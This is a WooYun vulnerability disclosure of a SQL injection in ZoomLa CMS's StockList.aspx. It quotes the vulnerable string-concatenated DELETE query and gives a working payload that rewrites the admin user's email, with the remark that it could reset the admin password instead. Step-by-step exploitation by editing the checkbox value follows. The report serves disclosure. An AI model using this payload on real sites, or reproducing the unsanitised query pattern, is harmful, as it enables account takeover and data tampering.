当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2014-060763

漏洞标题:逐浪CMS SQL Update/CMS2 V1.3 V1.4 V1.5、 CMS6.0均受影响

相关厂商:逐浪CMS

漏洞作者: Damo

提交时间:2014-05-15 11:48

修复时间:2014-08-10 11:50

公开时间:2014-08-10 11:50

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:20

漏洞状态:漏洞已经通知厂商但是厂商忽略漏洞

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2014-05-15: 细节已通知厂商并且等待厂商处理中
2014-05-20: 厂商主动忽略漏洞,细节向第三方安全合作伙伴开放
2014-07-14: 细节向核心白帽子及相关领域专家公开
2014-07-24: 细节向普通白帽子公开
2014-08-03: 细节向实习白帽子公开
2014-08-10: 细节向公众公开

简要描述:

话说 上次提交直接给忽略 那只好拿官方Demo做测试 另外此洞在2008年就已经存在

详细说明:

此问题为UPdate类型
文件
/user/usershop/StockList.aspx 问题参数 Item
问题代码如下

protected void Button3_Click(object sender, EventArgs e)
{
string text = base.Request.Form["Item"];
if (!string.IsNullOrEmpty(text) && this.bll.delstock(text))------------------此处
{
base.Response.Write("<script language=javascript>alert('批量删除成功!');location.href='StockManage.aspx';</script>");
return;
}
base.Response.Write("<script language=javascript>alert('批量删除失败!请选择您要删除的数据');location.href='StockManage.aspx';</script>");
}

public bool delstock(string str)
{
string strSql = "delete from ZL_UserStock where (id in (" + str + "))";
return SqlHelper.ExecuteSql(strSql, null);
}


构造参数

0))update ZL_User set Email='wooyun' where username='admin'--   //修改用户email  YY此处可以更改为修改管理员密码


过程 登陆后访问
http://demo.zoomla.cn/user/usershop/stocklist.aspx?Stocktype=1&a=aaa&id=111
firebug修改页面<table>内容
图:

.png


内容如下:

<table width="100%" border="0" cellspacing="0" cellpadding="0" style="margin: 0 auto;background-color: white;" class="border">
<tbody><tr align="center" style="background:#FFBD59">
<td width="5%" class="title"><input type="checkbox" onclick="javascript:CheckAll(this);" name="Checkall" id="Checkall"></td>
<td width="13%" class="title">单据类型</td>
<td width="20%" class="title">单据编号</td>
<td width="15%" class="title">
录入时间</td>
<td width="12%" class="title"> 录入者</td>
<td width="20%" class="title"> 备注</td>
<td width="15%" class="title"> 操作</td>
</tr>

<tr onmouseout="this.className='tdbg'" onmouseover="this.className='tdbgmouseover'" class="tdbg">
<td height="22" align="center"><input type="checkbox" value="3" name="Item"></td>
<td height="22" align="center">出库</td>
<td height="22" align="center">订单</td>
<td height="22" align="center">2014/5/14 21:54:09</td>
<td height="22" align="center">admin</td>
<td height="22" align="center">好家伙</td>
<td height="22" align="center"><a href="StockAdd.aspx?menu=edit&amp;id=3">修改</a> <a onclick="return confirm('不可恢复性删除数据,你确定将该数据删除吗?');" href="Stocklist.aspx?menu=del&amp;id=3">删除</a></td>
</tr>

<tr onmouseout="this.className='tdbg'" onmouseover="this.className='tdbgmouseover'" class="tdbg">
<td height="22" align="center"><input type="checkbox" value="2" name="Item"></td>
<td height="22" align="center">出库</td>
<td height="22" align="center">订单</td>
<td height="22" align="center">2014/5/14 21:54:09</td>
<td height="22" align="center">admin</td>
<td height="22" align="center">好家伙</td>
<td height="22" align="center"><a href="StockAdd.aspx?menu=edit&amp;id=2">修改</a> <a onclick="return confirm('不可恢复性删除数据,你确定将该数据删除吗?');" href="Stocklist.aspx?menu=del&amp;id=2">删除</a></td>
</tr>

<tr class="tdbg">
<td height="22" align="center" class="tdbgleft" colspan="10">共 <span id="Allnum">2</span> 条记录 <span id="Toppage"><a href="?Stocktype=0&amp;Currentpage=0">首页</a></span> <span class="aspNetDisabled" id="Nextpage"><a href="?Stocktype=0&amp;Currentpage=0">上一页</a></span> <span class="aspNetDisabled" id="Downpage"><a href="?Stocktype=0&amp;Currentpage=1">下一页</a></span> <span id="Endpage"><a href="?Stocktype=0&amp;Currentpage=1">尾页</a></span> 页次:<span id="Nowpage">1</span>/<span id="PageSize">1</span>页 <span id="pagess">10</span>条记录/页 转到第<select id="DropDownList1" onchange="javascript:setTimeout('__doPostBack(\'DropDownList1\',\'\')', 0)" name="DropDownList1">
<option value="1">1</option>
</select>页</td>
</tr>
</tbody></table>


修改复选框中的value

Value.png


然后点击删除按钮即可

漏洞证明:

.png


本地下载的 CMS2 V1.3 V1.4 V1.5、 CMS6.0均受影响
另外 从最早的一个文件来看此洞在2008年就已经存在

修复方案:

找程序猿

版权声明:转载请注明来源 Damo@乌云


漏洞回应

厂商回应:

危害等级:无影响厂商忽略

忽略时间:2014-08-10 11:50

厂商回复:

最新状态:

暂无


漏洞评价:

评论

  1. 2014-05-15 12:01 | wefgod ( 普通白帽子 | Rank:1807 漏洞数:179 | 力不从心)

    哈哈我都是用官网和官方demo两个来测试。就给过1rank,呵呵呵呵呵

  2. 2014-05-15 12:07 | what_news ( 普通白帽子 | Rank:195 漏洞数:48 | 小菜一个 希望成为大菜)

    求不忽略 哈哈

  3. 2014-05-15 12:08 | xsser 认证白帽子 ( 普通白帽子 | Rank:254 漏洞数:18 | 当我又回首一切,这个世界会好吗?)

    @wefgod 悲剧啊

  4. 2014-05-15 12:34 | Damo ( 普通白帽子 | Rank:209 漏洞数:31 | 我只是喜欢看加菲猫而已ส็็็็็็็็...)

    @xsser @wefgod 出生的时候就带了一个悲催的命

  5. 2014-05-15 12:34 | wefgod ( 普通白帽子 | Rank:1807 漏洞数:179 | 力不从心)

    @Damo @xsser 谢谢同情